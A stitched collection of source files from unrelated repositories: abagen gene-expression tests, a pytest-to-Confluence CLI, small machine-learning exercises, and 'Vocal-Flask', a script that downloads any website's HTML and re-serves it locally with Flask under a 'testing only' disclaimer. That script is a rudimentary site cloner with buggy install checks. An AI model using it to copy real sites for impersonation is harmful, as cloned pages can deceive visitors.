agg_metric=opts.agg_metric,
ibf_threshold=opts.ibf_threshold,
probe_selection=opts.probe_selection,
lr_mirror=opts.lr_mirror,
gene_norm=opts.gene_norm,
sample_norm=opts.sample_norm,
corrected_mni=opts.corrected_mni,
reannotated=opts.reannotated,
return_counts=opts.save_counts,
return_donors=opts.save_donors,
donors=opts.donors,
data_dir=opts.data_dir,
verbose=opts.verbose)
output_path = os.path.dirname(opts.output_file)
fname_pref = os.path.splitext(os.path.basename(opts.output_file))[0]
# WHY?!?
if opts.stdout and not (opts.save_counts or opts.save_donors):
expression.to_csv(sys.stdout)
return
# expand the tuple, if needed
if opts.save_counts:
expression, counts = expression
counts_fname = os.path.join(output_path, fname_pref + '_counts.csv')
lgr.info('Saving samples counts to {}'.format(counts_fname))
counts.to_csv(counts_fname)
# determine how best to save expression output files
if opts.save_donors:
if opts.donors == 'all':
donors = list(donors.value_set('subj'))
else:
donors = [donors[f] for f in opts.donors]
# save each donor dataframe as a separate file
for donor, exp in zip(donors, expression):
exp_fname = os.path.join(output_path,
fname_pref + '_{}.csv'.format(donor))
lgr.info('Saving donor {} info to {}'.format(donor, exp_fname))
exp.to_csv(exp_fname)
else:
expression.to_csv(opts.output_file)
if __name__ == '__main__':
raise RuntimeError('abagen/cli/run.py should not be run directly.\nPlease '
'`pip install` abagen and use the `abagen` command.')
```
#### File: abagen/tests/test_correct.py
```python
import itertools
import numpy as np
import pandas as pd
import pytest
import scipy.stats as sstats
from abagen import allen, correct, io
from abagen.utils import flatten_dict
@pytest.fixture(scope='module')
def donor_expression(testfiles, atlas):
return allen.get_expression_data(atlas['image'], atlas['info'],
exact=False, return_donors=True,
donors=['12876', '15496'])
def test__unpack_tuple():
assert correct._unpack_tuple((3,)) == 3
assert correct._unpack_tuple((3, 3)) == (3, 3)
assert correct._unpack_tuple([2]) == 2
assert correct._unpack_tuple([2, 4]) == [2, 4]
assert correct._unpack_tuple(np.array([3])) == 3
assert np.all(correct._unpack_tuple(np.array([3, 3])) == [3, 3])
def test__batch():
rs = np.random.RandomState(1234)
# p-values for ANOVA should all be ~0 (large group differences) before
# batch correction
y = [rs.normal(size=(100, 1000)) + f for f in [5, 0, 0]]
assert np.allclose(sstats.f_oneway(*y)[1], 0)
# F-values for ANOVA should all be ~0 (no group differences) after batch
# correction; p-values returned here are sometimes NaN so not a good test
out = correct._batch_correct(y)
assert np.allclose(sstats.f_oneway(*out)[0], 0)
# mean expressions after correction should be ~equal
assert np.allclose([o.mean() for o in out], 1.24871965683026)
with pytest.raises(ValueError):
correct._batch_correct([y[0]])
def test__rescale():
rs = np.random.RandomState(1234)
y = rs.normal(size=(100, 1000)) + 10
out = correct._rescale(y)
# default max = 1, min =0
assert np.allclose(out.max(axis=0), 1) and np.allclose(out.min(axis=0), 0)
# can specify alternative min/max
out = correct._rescale(y, low=5, high=6)
assert np.allclose(out.max(axis=0), 6) and np.allclose(out.min(axis=0), 5)
# different axis works, too!
out = correct._rescale(y, axis=1)
assert np.allclose(out.max(axis=1), 1) and np.allclose(out.min(axis=1), 0)
@pytest.mark.parametrize('a', [0, 1])
def test__rs(a):
rs = np.random.RandomState(1234)
# create an array with a pretty ridiculous outlier effect to try and fix
y = rs.normal(size=(100, 1000))
y[0] += 1000
y[:, 0] += 1000
out = correct._rs(y, axis=a)
# max will always be less than one, min will always be greater than zero
assert np.all(out.max(axis=a) <= 1) and np.all(out.min(axis=a) >= 0)
# we should have reduced skewness / kurtosis compared to the original
assert np.all(sstats.skew(out, axis=a) < sstats.skew(y, axis=a))
assert np.all(sstats.kurtosis(out, axis=a) < sstats.kurtosis(y, axis=a))
# this is a weird test; we're gonna bin the data at 0.2 intervals and make
# sure no bins are empty. if one is something probably went wrong, right?
for low in np.arange(0, 1, 0.2):
hi = low + 0.2 + np.spacing(1) # include 1
assert np.all(np.sum(np.logical_and(out >= low, out < hi), axis=a) > 0)
@pytest.mark.parametrize('a', [0, 1])
def test__srs(a):
rs = np.random.RandomState(1234)
# create an array with a pretty ridiculous outlier effect to try and fix
y = rs.normal(size=(100, 1000))
y[0] += 1000
y[:, 0] += 1000
out = correct._srs(y, axis=a)
# max will always be one, min will always be zero
assert np.allclose(out.max(axis=a), 1) and np.allclose(out.min(axis=a), 0)
# we should have reduced skewness / kurtosis compared to the original
assert np.all(sstats.skew(out, axis=a) < sstats.skew(y, axis=a))
assert np.all(sstats.kurtosis(out, axis=a) < sstats.kurtosis(y, axis=a))
# this is a weird test; we're gonna bin the data at 0.2 intervals and make
# sure no bins are empty. if one is something probably went wrong, right?
for low in np.arange(0, 1, 0.2):
hi = low + 0.2 + np.spacing(1) # include 1
assert np.all(np.sum(np.logical_and(out >= low, out < hi), axis=a) > 0)
@pytest.mark.parametrize('method', [
'center', 'zscore', 'minmax', 'sigmoid', 'scaled_sigmoid',
'scaled_sigmoid_quantiles', 'robust_sigmoid', 'scaled_robust_sigmoid',
'mixed_sigmoid'
])
def test_normalize_expression_real(testfiles, method):
# load in data and add some NaN values for "realness"
micro = [
io.read_microarray(f).T
for f in flatten_dict(testfiles, 'microarray').values()
]
inds = [[5, 15, 25], [0, 10, 20]]
for n, idx in enumerate(inds):
micro[n].iloc[idx] = np.nan
minmax = [
'minmax', 'scaled_sigmoid', 'scaled_sigmoid_quantiles',
'scaled_robust_sigmoid', 'mixed_sigmoid'
]
out = correct.normalize_expression(micro, norm=method)
for exp, idx in zip(out, inds):
assert np.all(np.isnan(exp.iloc[idx]))
exp = exp.dropna(axis=1, how='all')
if method in minmax:
assert np.allclose(exp.max(axis=0), 1)
assert np.allclose(exp.min(axis=0), 0)
elif method == 'robust_sigmoid':
assert np.all(exp.max(axis=0) <= 1)
assert np.all(exp.min(axis=0) >= 0)
elif method in ['center', 'zscore']:
assert np.allclose(exp.mean(axis=0), 0)
if method == 'zscore':
assert np.allclose(exp.std(axis=0, ddof=1), 1)
# # batch correct: force means identical
# out = correct.normalize_expression(micro, norm='batch')
# assert np.allclose(*[e.mean(axis=0, skipna=True) for e in out])
# # the NaN values should still be there, though
# for exp, idx in zip(out, inds):
# assert np.all(np.isnan(exp.iloc[idx]))
# invalid norm parameter
with pytest.raises(ValueError):
correct.normalize_expression(micro, norm='notanorm')
# # can't do batch correction with only one donor
# with pytest.raises(ValueError):
# correct.normalize_expression(micro[0], norm='batch')
def test_remove_distance(donor_expression, atlas):
expr = pd.concat(donor_expression).groupby('label').aggregate(np.mean)
expr = expr.dropna(axis=1, how='any')
coexpr = np.corrcoef(expr)
for atlas_info in [None, atlas['info']]:
out = correct.remove_distance(coexpr, atlas['image'], atlas_info)
assert np.allclose(out, out.T)
assert isinstance(out, np.ndarray)
# subset expression data + and atlas_info
coexpr = np.corrcoef(expr.iloc[:-1])
removed_label = pd.read_csv(atlas_info).iloc[:-1]
out = correct.remove_distance(coexpr, atlas['image'], removed_label,
labels=removed_label.id)
assert np.allclose(out, out.T)
assert isinstance(out, np.ndarray)
assert len(out) == len(removed_label)
with pytest.raises(ValueError):
correct.remove_distance(np.corrcoef(expr), atlas['image'],
removed_label, labels=removed_label.id)
with pytest.raises(ValueError):
correct.remove_distance(expr, atlas['image'], atlas['info'])
def test_resid_dist():
dv = np.array([1, 2, 3, 4, 5])
# residualizing against self should yield 0
assert np.allclose(correct._resid_dist(dv, iv=dv), 0)
# residualizing against perfectly anticorrelated should also yield 0
assert np.allclose(correct._resid_dist(dv, iv=dv[::-1]), 0)
# residualizing against scaled self should also yield 0 (intercept incl)
assert np.allclose(correct._resid_dist(dv, iv=(dv + 10)), 0)
# residualizing against constant should yield de-meaned input
assert np.allclose(correct._resid_dist(dv, iv=np.ones_like(dv)),
dv - dv.mean())
def test_keep_stable_genes(donor_expression):
for thr, per, rank in itertools.product(np.arange(0, 1, 0.1),
[True, False],
[True, False]):
out = correct.keep_stable_genes(donor_expression, threshold=thr,
percentile=per, rank=rank)
assert all([isinstance(f, pd.DataFrame) for f in out])
for df1, df2 in itertools.combinations(out, 2):
assert df1.shape == df2.shape
# check that `return_stability` provides expression and stability
out, stab = correct.keep_stable_genes(donor_expression, threshold=0,
return_stability=True)
assert len(stab) == len(out[0].columns)
assert np.all(out[0].columns == donor_expression[0].columns)
```
#### File: abagen/tests/test_samples.py
```python
import numpy as np
import pandas as pd
import pytest
from abagen import samples_
from abagen.utils import first_entry, flatten_dict
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# generate fake data (based largely on real data) so we know what to expect #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
@pytest.fixture(scope='module')
def ontology():
""" Fake ontology dataframe
"""
sid = [4251, 4260, 4322, 4323, 9422]
hemi = ['L', 'R', 'L', 'R', np.nan]
acronym = ['S', 'S', 'Cl', 'Cl', 'CC']
path = [
'/4005/4006/4007/4008/4219/4249/12896/4251/',
'/4005/4006/4007/4008/4219/4249/12896/4260/',
'/4005/4006/4007/4275/4321/4322/',
'/4005/4006/4007/4275/4321/4323/',
'/4005/9352/9418/9422/',
]
name = [
'subiculum, left',
'subiculum, right',
'claustrum, left',
'claustrum, right',
'central canal',
]
return pd.DataFrame(dict(id=sid, hemisphere=hemi, name=name,
acronym=acronym, structure_id_path=path))
@pytest.fixture(scope='module')
def mm_annotation():
""" Fake annotation dataframe with some samples mislabelled
"""
mni_x = [-10, -20, 30, 40, 0]
sid = [4251, 4323, 4323, 4251, 9422]
sacr = ['S', 'Cl', 'Cl', 'S', 'CC']
sname = [
'subiculum, left',
'claustrum, right',
'claustrum, right',
'subiculum, left',
'central canal'
]
ind = pd.Series(range(len(sid)), name='sample_id')
return pd.DataFrame(dict(mni_x=mni_x, structure_id=sid,
structure_acronym=sacr, structure_name=sname),
index=ind)
@pytest.fixture(scope='module')
def annotation(mm_annotation):
""" Fake annotation dataframe
"""
out = mm_annotation.loc[[0, 2, 4]].reset_index(drop=True)
out.index.name = 'sample_id'
return out
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# test all the functions on our generated fake data so we know what to expect #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def test_update_mni_coords():
# xyz coordinates are getting replaced so who cares about the original
# but ids are important and need to be real!
x = y = z = [-10, 20, 30, 40]
ids = [594, 2985, 1058, 1145]
annotation = pd.DataFrame(dict(mni_x=x, mni_y=y, mni_z=z, well_id=ids))
out = samples_.update_mni_coords(annotation)
# confirm that no samples were lost / reordered during the update process
# and that we still have all our columns
assert np.all(out['well_id'] == annotation['well_id'])
assert np.all(out.columns == annotation.columns)
# but DO confirm that _something_ changes about the dataframes (i.e., our
# bogus coordinates should be different)
with pytest.raises(AssertionError):
pd.testing.assert_frame_equal(out, annotation)
assert np.all(out['mni_x'] != annotation['mni_x'])
assert np.all(out['mni_y'] != annotation['mni_y'])
assert np.all(out['mni_z'] != annotation['mni_z'])
# if we provide invalid well_ids we should receive an error!
annotation['well_id'] = [594, 2985, 1058, 99999999999]
with pytest.raises(KeyError):
samples_.update_mni_coords(annotation)
@pytest.mark.parametrize('path, expected', [
('/4005/4006/4007/4275/4276/4277/4278/12899/4286/', 'subcortex'),
('/4005/4006/4007/4275/4327/4341/4342/4344/', 'subcortex'),
('/4005/4006/4007/4008/4084/4103/4111/4112/4113/', 'cortex'),
('/4005/4006/4833/4696/4697/12930/12931/12933/4751/', 'cerebellum'),
('/4005/4006/9512/9676/9677/9680/9681/', 'brainstem'),
('/4005/4006/4833/9131/9132/9133/9492/', 'brainstem'),
('/4005/9218/9298/12959/265505622/', 'white matter'),
('/4005/9218/9219/9220/9227/', 'white matter'),
('/4005/9352/9418/9419/9708/', 'other'),
('/4005/9352/9353/9400/9402/', 'other'),
('/4005/4006/4833', None),
('thisisnotapath', None), # TODO: should this error?
])
def test__get_struct(path, expected):
out = samples_._get_struct(path)
assert out == expected if expected is not None else out is None
def test_drop_mismatch_samples(mm_annotation, ontology):
# here's what we expect (i.e., indices 1 & 3 are dropped and the structure
# for the remaining samples is correctly extracted from the paths)
expected = pd.DataFrame(dict(hemisphere=['L', 'R', np.nan],
mni_x=[-10, 30, 0],
structure_acronym=['S', 'Cl', 'CC'],
structure=['subcortex', 'subcortex', 'other'],
structure_id=[4251, 4323, 9422],
structure_name=['subiculum, left',
'claustrum, right',
'central canal']),
index=[0, 2, 4])
# do we get what we expect? (ignore ordering of columns / index)
out = samples_.drop_mismatch_samples(mm_annotation, ontology)
pd.testing.assert_frame_equal(out, expected, check_like=True)
def test__mirror_ontology(annotation, ontology):
aexp = pd.DataFrame(dict(mni_x=[-10, 30, 0],
structure_acronym=['S', 'Cl', 'CC'],
structure_id=[4260, 4322, 9422],
structure_name=['subiculum, right',
'claustrum, left',
'central canal']),
index=pd.Series(range(3), name='sample_id'))
# this function doesn't touch mni_x -- it just assumes that all the
# hemisphere designation are incorrect and updates the structure id, name,
# and acronyms accordingly
a = samples_._mirror_ontology(annotation, ontology)
pd.testing.assert_frame_equal(a, aexp, check_like=True)
def test_mirror_samples(annotation, ontology):
# we're changing quite a bit of stuff in the annotation dataframe
aexp = pd.DataFrame(dict(mni_x=[-10, 30, 0, 10, -30],
structure_acronym=['S', 'Cl', 'CC', 'S', 'Cl'],
structure_id=[4251, 4323, 9422, 4260, 4322],
structure_name=['subiculum, left',
'claustrum, right',
'central canal',
'subiculum, right',
'claustrum, left']),
index=[0, 1, 2, 0, 1])
# but let's confirm all the outputs are as-expected
a = samples_.mirror_samples(annotation, ontology)
pd.testing.assert_frame_equal(a, aexp, check_like=True)
@pytest.mark.xfail
def test__assign_sample(atlas):
atlas = atlas['image']
assert samples_._assign_sample([[0, 0, 0]], atlas, tolerance=0) == 0
assert samples_._assign_sample([[26, 96, 66]], atlas, tolerance=0) == 71
assert False
@pytest.mark.xfail
def test__check_label():
assert False
@pytest.mark.xfail
def test_label_samples():
assert False
def test_groupby_index():
# default usage (no params)
microarray = pd.DataFrame([[0., 1.], [1., 2.], [5., 6.], [0., 1.]],
index=pd.Series([1, 1, 1, 2], name='label'))
expected = pd.DataFrame([[2., 3.], [0., 1.]],
index=pd.Series([1, 2], name='label'))
out = samples_.groupby_index(microarray)
pd.testing.assert_frame_equal(out, expected, check_like=True)
# supplying `labels` appends NaN rows to output
expected = pd.DataFrame([[2., 3.], [0., 1.], [np.nan, np.nan]],
index=pd.Series([1, 2, 3], name='label'))
out = samples_.groupby_index(microarray, labels=[1, 2, 3])
pd.testing.assert_frame_equal(out, expected, check_like=True)
# changing `metric` works
expected = pd.DataFrame([[1., 2.], [0., 1.]],
index=pd.Series([1, 2], name='label'))
out = samples_.groupby_index(microarray, metric='median')
pd.testing.assert_frame_equal(out, expected, check_like=True)
def test_aggregate_samples():
m1 = pd.DataFrame([[0., 1.], [1., 2.], [5., 6.], [0., 1.]],
index=pd.Series([1, 1, 1, 2], name='label'))
m2 = pd.DataFrame([[0., 1.], [1., 2.], [5., 6.], [10., 11.]],
index=pd.Series([1, 1, 2, 3], name='label'))
# region_agg='donors'
expected = pd.DataFrame([[1.25, 2.25],
[2.5, 3.5],
[10., 11.],
[np.nan, np.nan]],
index=pd.Series([1, 2, 3, 4], name='label'))
out = samples_.aggregate_samples([m1, m2], labels=[1, 2, 3, 4],
region_agg='donors', agg_metric='mean')
pd.testing.assert_frame_equal(out, expected, check_like=True)
# region_agg = 'samples'
expected = pd.DataFrame([[1.4, 2.4],
[2.5, 3.5],
[10., 11.],
[np.nan, np.nan]],
index=pd.Series([1, 2, 3, 4], name='label'))
out = samples_.aggregate_samples([m1, m2], labels=[1, 2, 3, 4],
region_agg='samples', agg_metric='mean')
pd.testing.assert_frame_equal(out, expected, check_like=True)
# return_donors=True, agg_metric='median'
expected = [
pd.DataFrame([[1., 2.], [0., 1.], [np.nan, np.nan], [np.nan, np.nan]],
index=pd.Series([1, 2, 3, 4], name='label')),
pd.DataFrame([[0.5, 1.5], [5, 6], [10, 11], [np.nan, np.nan]],
index=pd.Series([1, 2, 3, 4], name='label'))
]
out = samples_.aggregate_samples([m1, m2], labels=[1, 2, 3, 4],
return_donors=True, agg_metric='median')
for e, o in zip(expected, out):
pd.testing.assert_frame_equal(o, e, check_like=True)
# check that poorly normalized genes are removed
m1.loc[2, 1], m2.loc[2, 1] = np.nan, np.nan
expected = pd.DataFrame([[1.25],
[2.5],
[10],
[np.nan]],
index=pd.Series([1, 2, 3, 4], name='label'))
out = samples_.aggregate_samples([m1, m2], labels=[1, 2, 3, 4],
region_agg='donors', agg_metric='mean')
pd.testing.assert_frame_equal(out, expected, check_like=True)
# invalid method for region_agg
with pytest.raises(ValueError):
samples_.aggregate_samples([m1, m2], region_agg='notamethod')
# region_agg='samples' incompatible with return_donors=True
with pytest.raises(ValueError):
samples_.aggregate_samples([m1, m2], region_agg='samples',
return_donors=True)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# test all the above functions again on real data to make sure we don't choke #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def test_update_mni_coords_real(testfiles):
for annotation in flatten_dict(testfiles, 'annotation').values():
samples_.update_mni_coords(annotation)
def test_label_samples_real(testfiles, atlas):
out = samples_.label_samples(first_entry(testfiles, 'annotation'),
atlas['image'])
assert isinstance(out, pd.DataFrame)
assert out.index.name == 'sample_id'
assert out.columns == ['label']
def test_drop_mismatch_samples_real(testfiles):
annotation = flatten_dict(testfiles, 'annotation').values()
ontology = flatten_dict(testfiles, 'ontology').values()
for an, on in zip(annotation, ontology):
samples_.drop_mismatch_samples(an, on)
def test_mirror_samples_real(testfiles):
annotation = flatten_dict(testfiles, 'annotation').values()
ontology = flatten_dict(testfiles, 'ontology').values()
orig = [363, 470]
for an, on, o in zip(annotation, ontology, orig):
out = samples_.mirror_samples(an, on)
# there should be more than the original # of samples but less than or
# equal to 2x that number (we can't MORE than duplicate)
assert len(out) > o and len(out) <= o * 2
def test__mirror_ontology_real(testfiles):
annotation = flatten_dict(testfiles, 'annotation').values()
ontology = flatten_dict(testfiles, 'ontology').values()
orig = [363, 470]
for a, o, l in zip(annotation, ontology, orig):
annot = samples_._mirror_ontology(a, o)
assert len(annot) == l
``` |
{
"source": "4lovi4/pytest-confluence-report",
"score": 2
} |
#### File: pytest-confluence-report/report/__main__.py
```python
import textwrap
from typer import Option, run
from report import SETTINGS_PATH, XML_PATH, easy_build
def main(
settings_path: str = Option(
default=SETTINGS_PATH,
help=textwrap.dedent(
f'Confluence settings path (e.g ``{SETTINGS_PATH}``)'
),
),
xml_path: str = Option(
default=XML_PATH,
help=textwrap.dedent(f'Pytest XML artifact path e.g ``{XML_PATH}``.'),
),
) -> None:
"""Tool allows to convert pytest results into Confluence page."""
easy_build(settings_path, xml_path)
if __name__ == "__main__":
run(main)
``` |
{
"source": "4lpha-x/Vocal-Flask",
"score": 3
} |
#### File: 4lpha-x/Vocal-Flask/fLska.py
```python
try:
import requests
except ImportError:
print('Requests Module Not Found !!')
imp = input('Do You Want To Install Requests? y/n ')
if imp=='y' or 'Y':
import os
os.system('pip install requests')
os.system('clear')
os.system('clear')
os.system('clear')
print('Installation Completed!')
print('Now Checking Flask Module')
try:
from flask import Flask
print('Program Starting..... ')
import os
import time
time.sleep(.45)
os.system('clear')
except ImportError:
print('Flask Module Not Found ')
imp = input('Do You Want To Install Flask? y/n ')
if imp=='y' or 'Y':
import os
os.system('pip install flask')
os.system('clear')
os.system('clear')
os.system('clear')
print('Installation Completed')
else:
exit();
#Importing
import time
col = '\033[1;31;40m'
def logo():
a = '''
┏┓╋┏┓╋╋╋╋╋╋╋╋╋╋┏━━┓╋╋╋┏━┳┓
┃┗┳┛┣━┳━┳━┓┏┳━━┫━┳┫┏━┓┃━┫┣┓
┗┓┃┏┫╋┃━┫╋┗┫┗┳━┫┏┫┗┫╋┗╋━┃━┫
╋┗━┛┗━┻━┻━━┻━┛╋┗┛┗━┻━━┻━┻┻┛'''
print(a)
print(col + ':::::::::::::Coded By Rc:::::::::::::')
print(':::::This Program Is Created For Testing Purposes Dont Use It For Any Illegal Purposes:::::')
time.sleep(1)
os.system('clear')
time.sleep(1)
os.system('clear')
print('\n>>>>>>>>>>>>>>>>Welcome To Vocal-Flask!!!<<<<<<<<<<<<<<<<<')
logo()
print('')
site = input('Enter Website URL Here : ')
try:
req = requests.get(site)
src = req.text
time.sleep(.34)
print('Getting Websites Source Code')
except:
print('Url Not Found Or Your Internet Is Not Available')
exit();
with open('src.html', 'w') as sorc:
r = sorc.write(src)
time.sleep(.65)
print('Saving Source Code As src.txt')
time.sleep(.23)
print('Moving The File To Template Folder ')
os.system('mv -f src.html templates')
time.sleep(.65)
print('File Moved Successfully!')
time.sleep(.45)
os.system('clear')
logo()
print("")
vol= '\033[3;37;40m'
print('Starting LocalHost At Port 5000')
print(vol + 'Localhost Started At Port Number 5000\nOpen 127.0.0.1/5000 In Your Browser To See Website')
print('\n')
from flask import Flask, render_template
app = Flask(__name__)
@app.route("/")
def hello():
return render_template('src.html')
app.run()
os.system('clear')
logo()
print('')
``` |
{
"source": "4lrz/ml-newbie",
"score": 3
} |
#### File: knn/challenge-1/data_gen.py
```python
import numpy as np
import knn.KNN as KNN
import random
def data_generator(mean, cov, count):
np.random.seed(1)
x, y = np.random.multivariate_normal(mean, cov, count).T
# plt.plot(x, y, 'x')
# plt.axis('equal')
# plt.show()
return [x, y]
def generate_dataset(count):
# class 1
mean1 = [0, 0]
cov1 = [[0.5, 0.3], [0.3, 1]]
# class 2
mean2 = [1, 2]
cov2 = [[0.25, 0.3], [0.3, 1]]
# class 2
mean3 = [2, 0]
cov3 = [[0.5, 0.3], [0.3, 1]]
x1, y1 = data_generator(mean1, cov1, count)
x2, y2 = data_generator(mean2, cov2, count)
x3, y3 = data_generator(mean3, cov3, count)
my_classes = []
for i in range(len(x1) - 1):
my_classes.append([x1[i], y1[i], 'class1'])
my_classes.append([x2[i], y2[i], 'class2'])
my_classes.append([x3[i], y3[i], 'class3'])
random.shuffle(my_classes)
return my_classes
myknn = KNN.knn(data=generate_dataset(100), k=3, weight=0.67)
test, predicted = myknn.test_data()
ac, cm, re = myknn.report(test, predicted)
print(re, "\n")
print(cm, "\n")
print(ac, "\n")
```
#### File: parzen/challenge-3/ocr.py
```python
import cv2
import os
import csv
import parzen.PARZEN as parzen
def extract_features(image_path, vector_size, label):
img = cv2.imread(image_path)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
small = cv2.resize(gray, (vector_size, vector_size))
small = small.flatten()
features = (small).tolist()
features[-1] = str(label)
return features
def write_csv(images_path='persian_number/'):
files = [os.path.join(images_path, p) for p in sorted(os.listdir(images_path))]
final_path = {}
database = []
for f in files:
tmp_list = [os.path.join(f, p) for p in sorted(os.listdir(f))]
# tmp_list[-1] = f[8:]
final_path[f[15:]] = (tmp_list)
# print(f[15:])
with open('file.csv', "w") as csv_file:
for key, value in final_path.items():
writer = csv.writer(csv_file, delimiter=',')
for path in value:
writer.writerow(extract_features(path, 30, key))
write_csv()
# dosent work for these feature
# radius = [0.5, 0.6, 0.7, 0.8, 0.9, 0.95, 1, 2, 3, 4]
#
# my_parzen = parzen.ParzenClassifier(csv_file='file.csv', data=None, r=radius, weight=.90)
# radius_accuracy_dict, best_radius = my_parzen.kfold_validation(10)
#
# test, predicted = my_parzen.test(best_radius)
#
# ac, cm, re = my_parzen.report(test, predicted)
#
# print(re, "\n")
# print(cm, "\n")
# print(ac, "\n")
```
#### File: ml-newbie/rbf/RadialBasisFunction.py
```python
import numpy as np
from numpy.linalg.linalg import pinv
from sklearn import datasets
def scale(data):
mat = np.asmatrix(data)
height, width = mat.shape
for i in range(0, width):
minimum = np.min(mat[:, i])
maximum = np.max(mat[:, i])
for k in range(0, height):
mat[k, i] = (mat[k, i] - minimum) / (maximum - minimum)
return mat
class RBFNetwork:
def __init__(self, pTypes, scaledData, labels):
self.pTypes = pTypes
self.protos = np.zeros(shape=(0, 4))
self.scaledData = scaledData
self.spread = 0
self.labels = labels
self.weights = 0
def generatePrototypes(self):
group1 = np.random.randint(0, 49, size=self.pTypes)
group2 = np.random.randint(50, 100, size=self.pTypes)
group3 = np.random.randint(101, 150, size=self.pTypes)
self.protos = np.vstack(
[self.protos, self.scaledData[group1, :], self.scaledData[group2, :], self.scaledData[group3, :]])
return self.protos
def sigma(self):
dTemp = 0
for i in range(0, self.pTypes * 3):
for k in range(0, self.pTypes * 3):
dist = np.square(np.linalg.norm(self.protos[i] - self.protos[k]))
if dist > dTemp:
dTemp = dist
self.spread = dTemp / np.sqrt(self.pTypes * 3)
def train(self):
self.generatePrototypes()
self.sigma()
hiddenOut = np.zeros(shape=(0, self.pTypes * 3))
for item in self.scaledData:
out = []
for proto in self.protos:
distance = np.square(np.linalg.norm(item - proto))
neuronOut = np.exp(-(distance) / (np.square(self.spread)))
out.append(neuronOut)
hiddenOut = np.vstack([hiddenOut, np.array(out)])
# print(hiddenOut)
self.weights = np.dot(pinv(hiddenOut), self.labels)
# print(self.weights)
def test(self):
items = [3, 4, 72, 82, 91, 120, 134, 98, 67, 145, 131]
for item in items:
data = self.scaledData[item]
out = []
for proto in self.protos:
distance = np.square(np.linalg.norm(data - proto))
neuronOut = np.exp(-(distance) / np.square(self.spread))
out.append(neuronOut)
netOut = np.dot(np.array(out), self.weights)
print('---------------------------------')
print(netOut)
print('Class is ', netOut.argmax(axis=0) + 1)
print('Given Class ', self.labels[item])
iris = datasets.load_iris()
X = iris.data[:, :]
y = iris.target
np.random.seed(1)
weight = 0.01
indices = np.random.permutation(len(X))
data = X[indices[:]]
labels = y[indices[:]]
oo = []
print(oo)
for o in labels:
if o == 0:
oo.append([1, 0, 0])
elif o == 1:
oo.append([0, 1, 0])
elif o == 2:
oo.append([0, 0, 1])
labels = oo
scaledData = scale(data)
network = RBFNetwork(4, scaledData, labels)
network.train()
network.test()
```
#### File: ml-newbie/som/SelfOrganizedMap.py
```python
import numpy as np
import itertools
class SOM(object):
def __init__(self, h, w, dim_feat):
"""
Construction of a zero-filled SOM.
h,w,dim_feat: constructs a (h,w,dim_feat) SOM.
"""
self.shape = (h, w, dim_feat)
self.som = np.zeros((h, w, dim_feat))
# Training parameters
self.L0 = 0.0
self.lam = 0.0
self.sigma0 = 0.0
self.data = []
self.hit_score = np.zeros((h, w))
def train(self, data, L0, lam, sigma0, initializer=np.random.rand, frames=None):
"""
Training procedure for a SOM.
data: a N*d matrix, N the number of examples,
d the same as dim_feat=self.shape[2].
L0,lam,sigma0: training parameters.
initializer: a function taking h,w and dim_feat (*self.shape) as
parameters and returning an initial (h,w,dim_feat) tensor.
frames: saves intermediate frames if not None.
"""
self.L0 = L0
self.lam = lam
self.sigma0 = sigma0
self.som = initializer(*self.shape)
self.data = data
for t in itertools.count():
if frames != None:
frames.append(self.som.copy())
if self.sigma(t) < 0.5:
print("final t:", t)
# print("quantization error:", self.quant_err())
break
i_data = np.random.choice(range(len(data)))
bmu = self.find_bmu(data[i_data])
self.hit_score[bmu] += 1
self.update_som(bmu, data[i_data], t)
def quant_err(self):
"""
Computes the quantization error of the SOM.
It uses the data fed at last training.
"""
bmu_dists = []
for input_vector in self.data:
bmu = self.find_bmu(input_vector)
bmu_feat = self.som[bmu]
bmu_dists.append(np.linalg.norm(input_vector - bmu_feat))
return np.array(bmu_dists).mean()
def find_bmu(self, input_vec):
"""
Find the BMU of a given input vector.
input_vec: a d=dim_feat=self.shape[2] input vector.
"""
list_bmu = []
for y in range(self.shape[0]):
for x in range(self.shape[1]):
dist = np.linalg.norm((input_vec - self.som[y, x]))
list_bmu.append(((y, x), dist))
list_bmu.sort(key=lambda x: x[1])
return list_bmu[0][0]
def update_som(self, bmu, input_vector, t):
"""
Calls the update rule on each cell.
bmu: (y,x) BMU's coordinates.
input_vector: current data vector.
t: current time.
"""
for y in range(self.shape[0]):
for x in range(self.shape[1]):
dist_to_bmu = np.linalg.norm((np.array(bmu) - np.array((y, x))))
self.update_cell((y, x), dist_to_bmu, input_vector, t)
def update_cell(self, cell, dist_to_bmu, input_vector, t):
"""
Computes the update rule on a cell.
cell: (y,x) cell's coordinates.
dist_to_bmu: L2 distance from cell to bmu.
input_vector: current data vector.
t: current time.
"""
self.som[cell] += self.N(dist_to_bmu, t) * self.L(t) * (input_vector - self.som[cell])
def update_bmu(self, bmu, input_vector, t):
"""
Update rule for the BMU.
bmu: (y,x) BMU's coordinates.
input_vector: current data vector.
t: current time.
"""
self.som[bmu] += self.L(t) * (input_vector - self.som[bmu])
def L(self, t):
"""
Learning rate formula.
t: current time.
"""
return self.L0 * np.exp(-t / self.lam)
def N(self, dist_to_bmu, t):
"""
Computes the neighbouring penalty.
dist_to_bmu: L2 distance to bmu.
t: current time.
"""
curr_sigma = self.sigma(t)
return np.exp(-(dist_to_bmu ** 2) / (2 * curr_sigma ** 2))
def sigma(self, t):
"""
Neighbouring radius formula.
t: current time.
"""
return self.sigma0 * np.exp(-t / self.lam)
``` |
{
"source": "4lxprime/Python-Template",
"score": 3
} |
#### File: 4lxprime/Python-Template/Funny.py
```python
from pystyle import Colors, Colorate, Center
from art import text2art
import os
# LOGO
# IMPORT MODULES
creator = Center.XCenter("""
╔═════════════════════════════════╗
| <== CREATED BY 4LXPRIME ==> |
╚═════════════════════════════════╝
""")
# DEFINE CREATOR
tables = Center.XCenter("""
╔════════════════╗
| 1) text 1 |
╠════════════════╣
| 2) text 2 |
╠════════════════╣
| 3) text 3 |
╚════════════════╝
""")
# DEFINE TABLE
def intro():
logo = Center.XCenter(text2art("NAME", "random"))
# "NAME" IS THE TITLE OF THE TOOL AND "random" IS THE POLICE
print(Colorate.Horizontal(Colors.yellow_to_red, logo, 1))
print(" ")
